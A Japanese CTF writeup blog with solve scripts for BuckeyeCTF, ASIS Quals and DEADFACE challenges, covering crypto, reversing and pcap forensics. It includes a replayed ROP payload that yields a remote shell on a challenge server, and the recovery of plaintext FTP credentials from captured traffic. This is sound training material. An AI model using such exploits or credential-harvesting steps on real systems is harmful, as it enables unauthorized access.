fwopCTF{h1dd3n_1n_7h3_h1570ry_28934}

BuckeyeCTF 2021 Writeup

この大会は2021/10/23 9:00(JST)~2021/10/25 9:00(JST)に開催されました。
今回もチームで参戦。結果は618点で505チーム中92位でした。
自分で解けた問題をWriteupとして書いておきます。

sanity_check (misc 1)

Discordに入り、arcsolstice (Kyle) のプロフィールを見ると、フラグが書いてあった。

buckeye{thX_4_p1ayin9}

replay (misc 30)

WiresharkでTCP Streamを見る。

    00000000  48 45 4c 4c 4f 20 48 4f  57 20 41 52 45 20 59 4f   HELLO HO W ARE YO
    00000010  55 20 44 4f 49 4e 47 20  54 4f 44 41 59 0a         U DOING  TODAY.
00000000  61 61 61 61 62 61 61 61  63 61 61 61 64 61 61 61   aaaabaaa caaadaaa
00000010  65 61 61 61 66 61 61 61  67 61 61 61 68 61 61 61   eaaafaaa gaaahaaa
00000020  69 61 61 61 6a 61 61 61  6b 61 61 61 6c 61 61 61   iaaajaaa kaaalaaa
00000030  6d 61 61 61 6e 61 61 61  6f 61 61 61 70 61 61 61   maaanaaa oaaapaaa
00000040  71 61 61 61 72 61 61 61  73 61 61 61 74 61 61 61   qaaaraaa saaataaa
00000050  75 61 61 61 76 61 61 61  77 61 61 61 78 61 61 61   uaaavaaa waaaxaaa
00000060  79 61 61 61 7a 61 61 62  62 61 61 62 63 61 61 62   yaaazaab baabcaab
00000070  64 61 61 62 65 61 61 62  66 61 61 62 67 61 61 62   daabeaab faabgaab
00000080  68 61 61 62 69 61 61 62  55 11 40 00 00 00 00 00   haabiaab U.@.....
00000090  0f 00 00 00 00 00 00 00  57 11 40 00 00 00 00 00   ........ W.@.....
000000A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
000000B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
000000C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
000000D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
000000E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
000000F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000100  00 00 00 00 00 00 00 00  04 20 40 00 00 00 00 00   ........ . @.....
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000130  3b 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ;....... ........
00000140  00 00 00 00 00 00 00 00  57 11 40 00 00 00 00 00   ........ W.@.....
00000150  00 00 00 00 00 00 00 00  33 00 00 00 00 00 00 00   ........ 3.......
00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000190  00 00 00 00 00 00 00 00  0a                        ........ .
00000199  69 64 0a                                           id.
    0000001E  75 69 64 3d 31 30 30 30  20 67 69 64 3d 31 30 30   uid=1000  gid=100
    0000002E  30 20 67 72 6f 75 70 73  3d 31 30 30 30 0a         0 groups =1000.
0000019C  6c 73 20 2d 6c 61 68 0a                            ls -lah. 
    0000003C  74 6f 74 61 6c 20 32 38  4b 0a 64 72 77 78 72 2d   total 28 K.drwxr-
    0000004C  78 72 2d 78 20 31 20 31  30 30 30 20 36 35 35 33   xr-x 1 1 000 6553
    0000005C  34 20 34 2e 30 4b 20 4f  63 74 20 31 39 20 31 34   4 4.0K O ct 19 14
    0000006C  3a 34 38 20 2e 0a 64 72  77 78 72 77 78 2d 2d 2d   :48 ..dr wxrwx---
    0000007C  20 31 20 31 30 30 30 20  36 35 35 33 34 20 34 2e    1 1000  65534 4.
    0000008C  30 4b 20 4f 63 74 20 31  39 20 31 34 3a 34 38 20   0K Oct 1 9 14:48 
    0000009C  2e 2e 0a 2d 72 77 78 72  2d 78 72 2d 78 20 31 20   ...-rwxr -xr-x 1 
    000000AC  31 30 30 30 20 36 35 35  33 34 20 20 31 36 4b 20   1000 655 34  16K 
    000000BC  4f 63 74 20 31 39 20 31  34 3a 34 38 20 63 68 61   Oct 19 1 4:48 cha
    000000CC  6c 6c 0a 2d 72 2d 2d 72  2d 2d 2d 2d 2d 20 31 20   ll.-r--r ----- 1 
    000000DC  31 30 30 30 20 36 35 35  33 34 20 20 20 35 31 20   1000 655 34   51 
    000000EC  4f 63 74 20 31 39 20 31  33 3a 35 38 20 66 6c 61   Oct 19 1 3:58 fla
    000000FC  67 2e 74 78 74 0a                                  g.txt.
000001A4  65 78 69 74 0a                                     exit.

最初の入力データをダウンロードし、同じようにデータを送ってコマンドを実行する。

import socket
import string

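def recvuntil(s, tail):
    """Read from socket *s* one byte at a time until *tail* has been received.

    Args:
        s: connected socket-like object exposing ``recv(n)``.
        tail: delimiter string to wait for.

    Returns:
        Everything received so far, ending with *tail*.

    Raises:
        EOFError: the peer closed the connection before *tail* arrived.
    """
    data = ''
    while tail not in data:
        chunk = s.recv(1)
        if not chunk:
            # recv() returns an empty string once the peer has closed the
            # connection; without this check the loop would spin forever.
            raise EOFError('connection closed before %r was received' % (tail,))
        data += chunk
    return data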

# Connect to the challenge service and echo its one-line greeting.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('misc.chall.pwnoh.io', 13371))
print recvuntil(s, '\n').rstrip()

# payload.bin holds the first client message exported from the capture and is
# sent back unmodified.  NOTE(review): the captured bytes embed absolute
# addresses (e.g. 0x401155, 0x402004), so a byte-for-byte replay presumably
# only works because the target binary is not position independent, which is
# also what the flag text says.
with open('payload.bin', 'rb') as f:
    payload = f.read()

print payload
s.sendall(payload)

# After the payload the service answers shell commands, as in the capture.
# Each entry is (command, number of reply lines to echo).
for cmd, reply_lines in (('id', 1), ('ls -lah', 5), ('cat flag.txt', 1)):
    print cmd
    s.sendall(cmd + '\n')
    for _ in range(reply_lines):
        print recvuntil(s, '\n').rstrip()

実行結果は以下の通り。

HELLO HOW ARE YOU DOING TODAY
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabU@            W@                                                                                                              @                                     ;                       W@             3                                                       

id
uid=1000 gid=1000 groups=1000
ls -lah
total 28K
drwxr-xr-x 1 1000 65534 4.0K Oct 19 14:37 .
drwxrwx--- 1 1000 65534 4.0K Oct 23 18:55 ..
-rwxr-xr-x 1 1000 65534  16K Oct 19 14:37 chall
-r--r----- 1 1000 65534   51 Oct 19 13:58 flag.txt
cat flag.txt
buckeye{g00d_th1ng_P1E_w4s_d1s4bl3d_0n_th3_b1n4ry}
buckeye{g00d_th1ng_P1E_w4s_d1s4bl3d_0n_th3_b1n4ry}

layers (misc 30)

$ sudo docker pull qxxxb/layers
Using default tag: latest
latest: Pulling from qxxxb/layers
a0d0a0d46f8b: Pull complete 
9a653c77c575: Pull complete 
5b35be6cf17d: Pull complete 
5895c1ac3aab: Pull complete 
Digest: sha256:a89678536727abc0fbfe693b19ac0f8454502351dc792dabbee47bc9ab7420b2
Status: Downloaded newer image for qxxxb/layers:latest
docker.io/qxxxb/layers:latest
$ sudo docker history qxxxb/layers
IMAGE          CREATED       CREATED BY                                      SIZE      COMMENT
0c01a25ae5b7   4 days ago    /bin/sh -c echo "Sorry, the flag has been de…   36B       
<missing>      4 days ago    /bin/sh -c rm flag.png                          0B        
<missing>      4 days ago    /bin/sh -c #(nop) COPY multi:6b3bd56201fda03…   599kB     
<missing>      8 weeks ago   /bin/sh -c #(nop)  CMD ["/bin/sh"]              0B        
<missing>      8 weeks ago   /bin/sh -c #(nop) ADD file:aad4290d27580cc1a…   5.6MB
$ sudo docker save qxxxb/layers > layers.tar

docker historyを見ると、flag.pngは後のレイヤーでrmされているだけなので、それより前のCOPYのレイヤーにはファイルが残っているはず。tarを展開して、さらに各フォルダにあるtarを展開してみていく。この結果、c74cc42fc4c046f80c5179802f03e40a40c3f69d22a9ee0ebbe9f7dcd2525467/layer.tarを解凍すると、flag.pngが展開されその画像にフラグが書いてあった。
f:id:satou-y:20211028212139p:plain

buckeye{D0CK3R_H4S_L4Y3RS}

Key exchange (crypto 40)

サーバの処理概要は以下の通り。

・p: 512ビット素数
・g = 5
・p, g表示
・a: 2 以上 p - 1 未満ランダム整数
・A = pow(g, a, p)
・A表示
・B: 入力(1 < B < p - 1)
・shared_secret = pow(B, a, p)
・key = hashlib.sha1(cun.long_to_bytes(shared_secret)).digest()[:16]
・AES-ECBでFLAGを暗号化し、表示

このことから以下が言える。

A = pow(g, a, p)
B = pow(g, b, p)
→pow(B, a, p) = pow(g, a*b, p) = pow(A, b, p)

bを適当に設定し、Bを算出して指定すれば、shared_secretを計算できる。keyがわかるので、あとはAES-ECB復号すればよい。

#!/usr/bin/env python3
import socket
import hashlib
import Crypto.Util.number as cun
from Crypto.Cipher import AES

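def recvuntil(s, tail):
    """Read from socket *s* one byte at a time until *tail* has been received.

    Args:
        s: connected socket-like object exposing ``recv(n)``.
        tail: delimiter to wait for, as ``bytes``.

    Returns:
        Everything received so far (ending with *tail*), decoded to ``str``.

    Raises:
        EOFError: the peer closed the connection before *tail* arrived.
    """
    data = b''
    while tail not in data:
        chunk = s.recv(1)
        if not chunk:
            # recv() returns b'' once the peer has closed the connection;
            # without this check the loop would spin forever.
            raise EOFError('connection closed before %r was received' % (tail,))
        data += chunk
    return data.decode()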

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('crypto.chall.pwnoh.io', 13374))

# Read the banner up to the "public key B: " prompt.  p, g and A are the last
# space-separated field of banner lines 4, 5 and 6.
data = recvuntil(s, b': ')
banner_lines = data.split('\n')
p, g, A = (int(banner_lines[idx].split(' ')[-1]) for idx in (4, 5, 6))

# Act as the second Diffie-Hellman party: choose a private exponent b and
# send B = g^b mod p.  The exchange is unauthenticated, so the server has no
# way to tell which peer supplied B.
b = 2
B = pow(g, b, p)
print(data + str(B))
s.sendall(str(B).encode() + b'\n')
data = recvuntil(s, b'\n').rstrip()
print(data)

# Both sides now hold g^(a*b) mod p.  Derive the AES key the same way the
# server does (first 16 bytes of SHA-1 over the shared secret) and decrypt.
ciphertext = bytes.fromhex(data.split(' ')[-1])
shared_secret = pow(A, b, p)
key = hashlib.sha1(cun.long_to_bytes(shared_secret)).digest()[:16]
cipher = AES.new(key, AES.MODE_ECB)
FLAG = cipher.decrypt(ciphertext).decode()
print(FLAG)

実行結果は以下の通り。

I'm going to send you the flag.
However, I noticed that an FBI agent has been eavesdropping on my messages,
so I'm going to send it to you in a way that ONLY YOU can decrypt the flag.

p = 9189089418456474917368747066281973490051965045657384487342558126262412785474286141982009810916885342175667345202133072630938632963164533529501471585186163
g = 5
A = 6191157549707973879955431056050210525324094161570328761336532821597318988065675105666189648260761713541318670962622768609485922408790902433436311152395871
Give me your public key B: 25
ciphertext = 5ffeaa2fc981ff5f2c91758f9452a32545084720b5114c9038cf2bb5f1e10165f2424dd7b97dc02b003c03f63a9f65a61a010f52e610d15163e475d853143771
buckeye{DH_1s_s0_h3ck1ng_c00l_l1k3_wh0_w0uldv3_th0ught_0f_th1s?}
buckeye{DH_1s_s0_h3ck1ng_c00l_l1k3_wh0_w0uldv3_th0ught_0f_th1s?}

Don't Talk to Blue Birds (misc 60)

問題タイトルから考えて、Twitterを探してみる。https://twitter.com/witch_securityを探してみると、pastebinへのリンクがあった。
f:id:satou-y:20211028212523p:plain
このリンクをたどると、以下のページにアクセスできる。

https://pastebin.com/4KHrJcUX

ここにまたURLが貼られている。

https://pastebin.com/qXDb43m1

このURLのアドレスにアクセスしてみると、フラグが書いてあった。

flag{aggre55ive_Hall0we3n_prepArati0ns_Und3rw4y}

ASIS CTF Quals 2021 Writeup

この大会は2021/10/23 0:00(JST)~2021/10/25 0:00(JST)に開催されました。
今回もチームで参戦。結果は275点で741チーム中77位でした。
自分で解けた問題をWriteupとして書いておきます。

Welcome (Warmup)

ルールのページにフラグが書いてあった。

ASIS{W3lc0me_t0_The_ASIS_CTF_Mad3_w1th_L0ve}

Crypto Warm up (Crypto, Warmup)

暗号化の処理概要は以下の通り。

・l: flagの長さ
・p: 15bit素数
・rstr: p - l の長さのランダムprintable文字列
・msg = flag + rstr
・s: ランダム1024bit整数(is_valid(s, p)(処理は不明)がTrue)
・enc = msg[0]
・i=0~p-2に対して以下を実行
 ・enc += msg[pow(s, i, p)]

暗号化文字列の長さがp。あとはフラグが"ASIS{"から始まることを前提に条件を満たすsを探す。
結果2パターンがあるので、両方についてフラグを求める。

#!/usr/bin/env python3
from Crypto.Util.number import *

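# Recover the flag from the permuted ciphertext stored in output.txt.
#
# Per the challenge description, enc = msg[0] followed by msg[pow(s, i, p)]
# for i = 0 .. p-2, so len(enc) == p and enc[k] == msg[pow(s, k - 1, p)] for
# k >= 1.  Only s mod p matters, so s is searched over range(p) using the
# known plaintext prefix 'ASIS{'.
with open('output.txt', 'r') as f:
    enc = f.read().rstrip().split(' = ')[1]

p = len(enc)

flag_head = 'ASIS{'

# For msg[2], msg[3] and msg[4] ('I', 'S', '{'), list every position in enc
# that holds that character.  A comprehension replaces the former
# index()/bare-except loop, which would also have swallowed unrelated errors.
indexes = [
    [pos for pos, ch in enumerate(enc) if ch == known]
    for known in flag_head[2:5]
]

# Keep every s for which some position of 'I' maps to index 2, some position
# of 'S' to index 3 and some position of '{' to index 4.
ss = []
for s in range(p):
    for i in indexes[0]:
        if pow(s, i - 1, p) == 2:
            for j in indexes[1]:
                if pow(s, j - 1, p) == 3:
                    for k in indexes[2]:
                        if pow(s, k - 1, p) == 4:
                            ss.append(s)

print('[+] s:', ss)

for s in ss:
    # first_exp[v] is the smallest j in 0 .. p-2 with pow(s, j, p) == v.
    # Building the table once avoids rescanning all exponents per character.
    first_exp = {}
    power = 1 % p
    for j in range(p - 1):
        first_exp.setdefault(power, j)
        power = power * s % p

    flag = 'A'
    i = 1
    # msg[i] is found at enc[j + 1].  Stop at the closing brace; i is bounded
    # by p because no power of s mod p can equal a larger value, so the loop
    # also terminates when no '}' is ever reached.
    while i < p:
        j = first_exp.get(i)
        if j is not None:
            flag += enc[j + 1]
        if flag[-1] == '}':
            break
        i += 1

    print('[*] flag:', flag)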

実行結果は以下の通り。leet文字で意味が通る方がフラグだった。

[+] s: [8562, 10927]
[*] flag: ASIS{_how_dFC.YptZTh1S?h0mx_m4d;_lGD_w;dr\_CUYpI0_5J2T3+?k!!!*Z}
[*] flag: ASIS{_how_d3CrYpt_Th1S_h0m3_m4dE_anD_wEird_CrYp70_5yST3M?!!!!!!}
ASIS{_how_d3CrYpt_Th1S_h0m3_m4dE_anD_wEird_CrYp70_5yST3M?!!!!!!}

Madras (Crypto)

RSA暗号で、nはa, b, cの素因数を持つ。a, b, cに対するいろんな計算結果が出力されているので、それを条件にz3でa, b, cを割り出す。割り出した後は、通常のRSA暗号の復号方法で復号する。

from z3 import *
from Crypto.Util.number import *

# The first seven lines of output.txt each end in an integer (last
# space-separated field): three combined values, three residues and enc.
with open('output.txt', 'r') as f:
    (param1, param2, param3,
     enc_a, enc_b, enc_c, enc) = [int(f.readline().rstrip().split(' ')[-1])
                                  for _ in range(7)]

# Symbolic unknowns for the three factors.
a, b, c = Ints('a b c')

s = Solver()
s.add(a * b + c == param1,
      b * c + a == param2,
      c * a + b == param3,
      enc % a == enc_a,
      enc % b == enc_b,
      enc % c == enc_c)

assert s.check() == sat

# Replace the symbols with the concrete integers from the model.
model = s.model()
a, b, c = [model[sym].as_long() for sym in (a, b, c)]

print '[+] a =', a
print '[+] b =', b
print '[+] c =', c

# Sanity check: each factor must have 513 // 3 = 171 bits.
for factor in (a, b, c):
    assert factor.bit_length() == 513 // 3

# Standard RSA decryption for a modulus with three prime factors.
e = 65537
n = a * b * c
phi = (a - 1) * (b - 1) * (c - 1)
d = inverse(e, phi)
FLAG = long_to_bytes(pow(enc, d, n))
print '[*] FLAG:', FLAG

実行結果は以下の通り。

[+] a = 1644376501336761869533914527999140316946467005479211
[+] b = 2769045283056871559108237639832652911114008081576651
[+] c = 1594118801665580510615541222527591707834932058213541
[*] FLAG: ASIS{m4dRa5_iZ_RSA_l1k3_cH41L3n9E?!!}
ASIS{m4dRa5_iZ_RSA_l1k3_cH41L3n9E?!!}

DEADFACE CTF Writeup

この大会は2021/10/15 23:00(JST)~2021/10/17 11:00(JST)に開催されました。
今回もチームで参戦。結果は4225点で1195チーム中73位でした。
自分で解けた問題をWriteupとして書いておきます。

Starter (Starter 10)

ルールのページにフラグが書いてあった。

flag{themz_the_ru1es}

Unfinished (Programming 5)

get_flag()の結果を表示させるだけ。

#!/usr/bin/env python3
from binascii import unhexlify as u

def get_flag():
    """Return the flag, which is stored hex-encoded inside the function."""
    encoded = '666c61677b30682d6c6f6f6b2d612d466c61477d'
    raw = u(encoded)
    return raw.decode('utf-8')


print('The flag is: {}'.format(get_flag()))

実行結果は以下の通り。

The flag is: flag{0h-look-a-FlaG}
flag{0h-look-a-FlaG}

The Count (Programming 275)

$ nc code.deadface.io 50000
DEADFACE gatekeeper: Let us see how good your programming skills are.
If a = 0, b = 1, c = 2, etc.. Tell me what the sum of this word is:

 You have 5 seconds to give me an answer.

Your word is: fretful

wordの各文字を数値にして合計を答える。

#!/usr/bin/python3
import socket
import string

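def recvuntil(s, tail):
    """Receive single bytes from socket *s* until *tail* shows up.

    Args:
        s: connected socket-like object exposing ``recv(n)``.
        tail: delimiter to wait for, as ``bytes``.

    Returns:
        The received data (ending with *tail*), decoded to ``str``.

    Raises:
        EOFError: the peer closed the connection before *tail* arrived.
    """
    data = b''
    while tail not in data:
        chunk = s.recv(1)
        if not chunk:
            # An empty read means the peer hung up; the original loop would
            # never terminate in that case (e.g. after the 5 second timeout).
            raise EOFError('connection closed before %r was received' % (tail,))
        data += chunk
    return data.decode()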

def get_count(s):
    """Return the sum of the letter positions (a = 0, b = 1, ...) in *s*.

    Raises ValueError (from ``str.index``) if *s* contains a character that
    is not a lowercase ASCII letter.
    """
    return sum(string.ascii_lowercase.index(letter) for letter in s)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('code.deadface.io', 50000))

# Echo the banner through the "... give me an answer." line, then the blank
# line that follows it.
print(recvuntil(s, b'answer.\n').rstrip())
print(recvuntil(s, b'\n').rstrip())

# "Your word is: <word>": the word is the last space-separated field.
data = recvuntil(s, b'\n').rstrip()
print(data)
word = data.split(' ')[-1]
ans = get_count(word)
print(ans)
s.sendall(str(ans).encode() + b'\n')

# The reply is two more lines (a blank line and the flag in the sample run).
for _ in range(2):
    print(recvuntil(s, b'\n').rstrip())

実行結果は以下の通り。

DEADFACE gatekeeper: Let us see how good your programming skills are.
If a = 0, b = 1, c = 2, etc.. Tell me what the sum of this word is:

 You have 5 seconds to give me an answer.

Your word is: reason
66

flag{d1c037808d23acd0dc0e3b897f344571ddce4b294e742b434888b3d9f69d9944}
flag{d1c037808d23acd0dc0e3b897f344571ddce4b294e742b434888b3d9f69d9944}

Luciafer's Cryptoware IOC 2 (Reverse Engineering 10)

ファイル名が暗号化されているとのこと。シーザー暗号と推測。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherでファイル名を復号する。

Rotation 3:
charles-a-geschickter-to-dark-angel-01.llabs
flag{charles-a-geschickter-to-dark-angel-01.llabs}

TheZeal0t's Fingerprints Are All Over This! (Reverse Engineering 10)

2つのファイルのSHA-256を答える問題。

$ sha256sum zealotcrypt-02.bin
5a54fb61f7b1a9b1b7405602388add7e3323890bc74952a62803ffb1a535338b  zealotcrypt-02.bin
ctf@ctf-virtual-machine:/mnt/hgfs/Shared$ sha256sum zealotcrypt-02-decrypt.bin  
969102c7feb6003624c4caf0e00fa9a60d96bc503ef0beb71ed4af68ba1fc047  zealotcrypt-02-decrypt.bin
flag{5a54fb61f7b1a9b1b7405602388add7e3323890bc74952a62803ffb1a535338b|969102c7feb6003624c4caf0e00fa9a60d96bc503ef0beb71ed4af68ba1fc047}

Cereal Killer (Reverse Engineering 50)

deadface_re01.binをGhidraでデコンパイルする。

/* Ghidra decompilation of main() from deadface_re01.bin.
 *
 * The function de-obfuscates a string from DAT_00102008 with a single-byte
 * XOR (0x5a), asks for a passphrase and prints the de-obfuscated string only
 * if the input matches three hard-coded constants.  Both the constants and
 * the XOR key are in the binary, so the check can be recovered statically.
 */
undefined8 main(void)

{
  long lVar1;
  long in_FS_OFFSET;
  byte local_238 [32];   /* receives the XOR-decoded string */
  /* local_218 / local_210 / local_20c are compared as 8 + 4 + 2 bytes;
     presumably one contiguous input buffer that Ghidra split - confirm. */
  long local_218;
  int local_210;
  short local_20c;
  long local_10;         /* copy of the value at FS:0x28, re-checked before return */
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  lVar1 = 0;
  /* Decode indices 0 .. 0x1e: every non-zero source byte is XORed with 0x5a;
     zero source bytes are skipped, leaving that local_238 slot unwritten. */
  do {
    if ((&DAT_00102008)[lVar1] != 0) {
      local_238[lVar1] = (&DAT_00102008)[lVar1] ^ 0x5a;
    }
    lVar1 = lVar1 + 1;
  } while (lVar1 != 0x1f);
  /* Force a terminator at index 30 (overwrites the last decoded byte). */
  local_238[30] = 0;
  puts("What is the best and sp00kiest breakfast cereal?");
  __printf_chk(1,&DAT_001020ad,"Please enter the passphrase: ");
  /* Same format string as the prompt above, so presumably "%s"; if so the
     read into the stack is not length-limited - NOTE(review): confirm. */
  __isoc99_scanf(&DAT_001020ad,&local_218);
  /* Little-endian ASCII: 0x68632d746e753063 = "c0unt-ch", 0x6c756330 = "0cul",
     0x61 as a short = "a" followed by the terminating NUL. */
  if (((local_218 == 0x68632d746e753063) && (local_210 == 0x6c756330)) && (local_20c == 0x61)) {
    puts((char *)local_238);
  }
  else {
    puts("notflag{you-guessed-it---this-is-not-the-flag}");
  }
  /* Stack-protector epilogue: the saved value must still match FS:0x28. */
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return 0;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

比較している部分をデコードする。

>>> '68632d746e753063'.decode('hex')[::-1]
'c0unt-ch'
>>> '6c756330'.decode('hex')[::-1]
'0cul'
>>> '61'.decode('hex')[::-1]
'a'

実行して、パスフレーズ"c0unt-ch0cula"を入力する。

$ ./deadface_re01.bin 
What is the best and sp00kiest breakfast cereal?
Please enter the passphrase: c0unt-ch0cula
flag{c0unt-ch0cula-cereal-FTW}
flag{c0unt-ch0cula-cereal-FTW}

TheZeal0t's Cryptoware IOC 1 (Reverse Engineering 100)

pcapからネットワークIoCを答える問題。Wiresharkでパケットをキャプチャしながら、実行する。
http://insidious.deadface.io/zealotcrypt-aes-key.txtをGETしていることがわかる。

・Host: insidious.deadface.io
・User-Agent: DEADFACE_LLABS_CRYPTOWARE/6.69
・Accept-Encoding: gzip
flag{insidious.deadface.io}

Cereal Killer 2 (Reverse Engineering 300)

>re02.exe
hlS4MbOmA+kQX71xXwPs7CsCWp9jQxCPa/oMk2o2bZr+jgweD4b8u80z5LVoBqC7
$ file re02.exe
re02.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows

dnSpyでデコンパイルする。

using System;
using System.Security.Cryptography;
using System.Text;

// Token: 0x02000002 RID: 2
// dnSpy decompilation of the class shown for re02.exe.
// Review notes:
//  - EncryptString and DecryptToString pass the same hard-coded 16-byte array
//    as both key and IV, so everything needed to decrypt ships in the binary.
//  - GetKey and the password field are not used by any other member shown here.
public static class SymmetricEncryptor
{
	// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000450
	// Entry point: prints a fixed Base64 string and calls none of the methods below.
	public static void Main(string[] args)
	{
		Console.WriteLine("hlS4MbOmA+kQX71xXwPs7CsCWp9jQxCPa/oMk2o2bZr+jgweD4b8u80z5LVoBqC7");
	}

	// Token: 0x06000002 RID: 2 RVA: 0x0000205C File Offset: 0x0000045C
	// Encrypts the UTF-8 bytes of toEncrypt with AES and returns the raw ciphertext.
	// Mode and padding are left at the Aes.Create() defaults (CBC and PKCS7 in .NET).
	public static byte[] EncryptString(string toEncrypt)
	{
		// 16 hard-coded bytes (AES-128), used below as key AND as IV.
		byte[] array = new byte[]
		{
			5,
			18,
			61,
			44,
			125,
			34,
			247,
			90,
			155,
			149,
			103,
			142,
			219,
			199,
			5,
			231
		};
		byte[] result;
		using (Aes aes = Aes.Create())
		{
			// CreateEncryptor(key, iv): both arguments are the same array.
			using (ICryptoTransform cryptoTransform = aes.CreateEncryptor(array, array))
			{
				byte[] bytes = Encoding.UTF8.GetBytes(toEncrypt);
				result = cryptoTransform.TransformFinalBlock(bytes, 0, bytes.Length);
			}
		}
		return result;
	}

	// Token: 0x06000003 RID: 3 RVA: 0x000020E4 File Offset: 0x000004E4
	// Base64-decodes the input and hands the bytes to DecryptToString.
	public static string DecryptFromBase64ToString(string base64Encrypted)
	{
		byte[] encryptedData = Convert.FromBase64String(base64Encrypted);
		return SymmetricEncryptor.DecryptToString(encryptedData);
	}

	// Token: 0x06000004 RID: 4 RVA: 0x00002100 File Offset: 0x00000500
	// Inverse of EncryptString: AES-decrypts encryptedData and returns it as a UTF-8 string.
	public static string DecryptToString(byte[] encryptedData)
	{
		// Same 16 hard-coded bytes as in EncryptString, again used as key and IV.
		byte[] array = new byte[]
		{
			5,
			18,
			61,
			44,
			125,
			34,
			247,
			90,
			155,
			149,
			103,
			142,
			219,
			199,
			5,
			231
		};
		string @string;
		using (Aes aes = Aes.Create())
		{
			// CreateDecryptor(key, iv): both arguments are the same array.
			using (ICryptoTransform cryptoTransform = aes.CreateDecryptor(array, array))
			{
				byte[] bytes = cryptoTransform.TransformFinalBlock(encryptedData, 0, encryptedData.Length);
				@string = Encoding.UTF8.GetString(bytes);
			}
		}
		return @string;
	}

	// Token: 0x06000005 RID: 5 RVA: 0x00002188 File Offset: 0x00000588
	// Returns the MD5 digest (16 bytes) of the UTF-8 bytes of password.
	// Not called by any member shown in this class.
	private static byte[] GetKey(string password)
	{
		byte[] bytes = Encoding.UTF8.GetBytes(password);
		byte[] result;
		using (MD5 md = MD5.Create())
		{
			result = md.ComputeHash(bytes);
		}
		return result;
	}

	// Token: 0x04000001 RID: 1
	// Decoy: starts with "f1ag{" (digit one) and is not read by any method shown here.
	private static string password = "f1ag{you-didnt-think-it-was-that-easy-did-you}";
}

AES暗号を使って暗号化していて、keyとivには同じ16バイトの固定配列が使われており、どちらもわかっているので、復号する。

from Crypto.Cipher import AES
import base64

# Key material copied from the byte array in the decompiled class above; the
# binary passes the same 16 bytes as both the AES key and the IV.
array = [5, 18, 61, 44, 125, 34, 247, 90, 155, 149, 103, 142, 219, 199, 5, 231]
key = ''.join(chr(b) for b in array)
iv = key

# Base64 string that the binary prints.
enc = base64.b64decode('hlS4MbOmA+kQX71xXwPs7CsCWp9jQxCPa/oMk2o2bZr+jgweD4b8u80z5LVoBqC7')

# CBC decrypt; any padding bytes at the end of the plaintext are not stripped.
flag = AES.new(key, AES.MODE_CBC, iv).decrypt(enc)
print(flag)
flag{frank3n-berry-goodness-NOM-NOM-NOM}

Monstrum ex Machina (Traffic Analysis 30)

被害者は検索エンジンを使って名前を調べられていた。この被害者の名前を答える問題。httpでフィルタリングし、さらに"GET /search"で検索すると、以下のパケットが見つかる。

GET /search?ct=17&pn=0&tn=ikaslist&rn=10&lm=0&ie=utf-8&word=%22charles%20geschickter%22 HTTP/1.1\r\n
flag{Charles Geschickter}

The SUM of All FEARS (Traffic Analysis 50)

拡張子を除くファイル名が同一のexeとbinがダウンロードされていて、そのMD5を答える問題。
ftpでフィルタリングすると、/TOOLS/lytton-crypt.exeと/TOOLS/lytton-crypt.binをRETRコマンドで取得していることがわかる。ftp-dataでフィルタリングして、この2つのファイルの分割ファイルをエクスポートし、結合する。

$ cat lytton-crypt.exe* > lytton-crypt.exe
$ cat lytton-crypt.bin* > lytton-crypt.bin
$ md5sum lytton-crypt.exe
9cb9b11484369b95ce35904c691a5b28  lytton-crypt.exe
$ md5sum lytton-crypt.bin
4da8e81ee5b08777871e347a6b296953  lytton-crypt.bin
flag{9cb9b11484369b95ce35904c691a5b28|4da8e81ee5b08777871e347a6b296953}

Release the Crackin'! (Traffic Analysis 50)

victimのパスワードを答える問題。FTPは認証情報を平文で送るので、ftpでフィルタリングし、lytton-crypt.binを取得しているセッションでTCP Streamを見ると、以下のようにUSERとPASSがそのまま読める。

USER cgeschickter
331 Password required
PASS darkangel
230 User logged in.
flag{darkangel}

Luciafer, You Clever Little Devil! (Traffic Analysis 50)

victimのコンピュータにログインしたレスポンスのあったパケット番号を答える問題。ftpでログイン成功した「Response: 230 User logged in.」というメッセージがあったパケット番号を答える。

flag{159765}

Luciafer's Fatal Error (Traffic Analysis 50)

ハッカーが持つべきではないプログラムを実行しているようで、そのプログラムのMD5を答える問題。
httpでフィルタリングすると、No.160446のパケットで、/secret_decoder.binをGETしている。エクスポートし、MD5を確認する。

$ md5sum secret_decoder.bin   
42e419a6391ca79dc44d7dcef1efc83b  secret_decoder.bin
flag{42e419a6391ca79dc44d7dcef1efc83b}

Scanners (Traffic Analysis 100)

被害者のマシンで開いている16384未満のTCPポート番号を答える問題。
被害者のマシンは192.168.100.103。Wiresharkで[統計]>[対話]を見てみる。そこで192.168.100.103へのTCP接続で通信量が0より大きいもののポート番号を答えればよい。

flag{21,135,139,445,3389}

Persistence Pays Off (Traffic Analysis 100)

ハッカーは永続性を実現するためのコマンドを発行しているので、その該当するパケット番号を答える問題。
.exeで検索していくと、以下のTCP Streamが見つかった。



hostname
dungeon
whoami
luciafer
